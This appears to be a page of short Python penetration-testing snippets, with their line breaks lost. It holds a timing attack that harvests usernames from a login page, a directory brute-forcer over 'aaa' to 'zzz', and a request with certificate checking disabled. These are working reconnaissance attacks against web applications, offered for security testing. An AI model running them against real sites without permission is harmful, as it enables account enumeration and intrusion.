#!/usr/bin/python3import requests# Set verify=False to avoid errors for self-signed x.509 certificatesr = requests.get('https://www.test.com/',verify=False)print (r.text)
Timing username harvesting attack
Use case: Testing timing username harvesting attack against Login page, knowing login (1 letter first name, last name) pattern, we go through alphabet + list of last names we got from OSINT against login page. Script will print request roundtrip time + username so we can see if site is vulnerable to attack.
#!/usr/bin/python3import requests# asci_lowercase is the string 'abcdefghijklmnopqrstuvwxyz'from string import ascii_lowercasewithopen('user_dictionary.txt')as f:# Following line reads each line of users_dictionary into python list# splitlines() removes the newlinses at the end of each line lines = f.read().splitlines()# Loop through each namefor lname in lines:for init in ascii_lowercase:# Combine letter with last name username=init+lname# Requests r = requests.post('http://www.test.com/securelogin.php', data = {'user':username,'pass':'badpass','button':'Login'}) roundtrip = r.elapsed.total_seconds()print (str(roundtrip)+": "+username)# Following command can be run to sort and show longest roundtrip# ./script.py | sort -n | tail -15
Forced Directory script
Use case: Script runs through aaa through zzz (17,576 requests) and tries to directory brute force. Will return code and url if a 200 or else is found.
#!/usr/bin/python3import requests# ascii_lowercase is the string 'abcdefghijklmnopqrstuvwxyz'from string import ascii_lowercaseurl="http://www.test.com/"# Base URLfor one in ascii_lowercase:for two in ascii_lowercase:for three in ascii_lowercase:# this section will run 17,576 times directory=one+two+three # directory will be 'aaa' through 'zzz'# Request http://www.test.com/aaa (etc...) r = requests.get(url+directory)# if status code is not "Not Found" (404) print url with status codeif r.status_code !=404:print (url+directory+": "+str(r.status_code))